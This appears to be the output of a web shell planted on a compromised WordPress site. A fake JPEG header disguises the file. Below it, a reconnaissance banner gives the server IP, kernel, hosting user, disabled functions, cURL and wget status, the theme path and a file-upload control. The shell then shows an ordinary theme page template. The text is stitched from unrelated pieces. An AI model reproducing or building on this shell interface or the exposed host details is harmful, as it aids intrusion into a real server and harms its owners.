���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.222 / Your IP : 216.73.216.222 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/chhapaee.com/public_html/wp-content/themes/printco/ |
Upload File : |
<?php /** * @package Bravisthemes */ get_header(); $printco_sidebar = printco()->get_sidebar_args(['type' => 'page', 'content_col'=> '9']); if ( class_exists('\Elementor\Plugin') && \Elementor\Plugin::$instance->documents->get(get_the_ID())->is_built_with_elementor() && $printco_sidebar['sidebar_class']==false) { $classes = 'elementor-container'; } else { $classes = 'container'; } ?> <div class="<?php echo esc_attr($classes); ?>"> <div class="row <?php echo esc_attr($printco_sidebar['wrap_class']) ?>"> <div id="pxl-content-area" class="<?php echo esc_attr($printco_sidebar['content_class']) ?>"> <main id="pxl-content-main"> <?php while ( have_posts() ) { the_post(); get_template_part( 'template-parts/content/content', 'page' ); if ( comments_open() || get_comments_number() ) { comments_template(); } } ?> </main> </div> <?php if ($printco_sidebar['sidebar_class']) : ?> <div id="pxl-sidebar-area" class="<?php echo esc_attr($printco_sidebar['sidebar_class']) ?>"> <div class="pxl-sidebar-sticky"> <?php dynamic_sidebar( 'sidebar-page' ); ?> </div> </div> <?php endif; ?> </div> </div> <?php get_footer();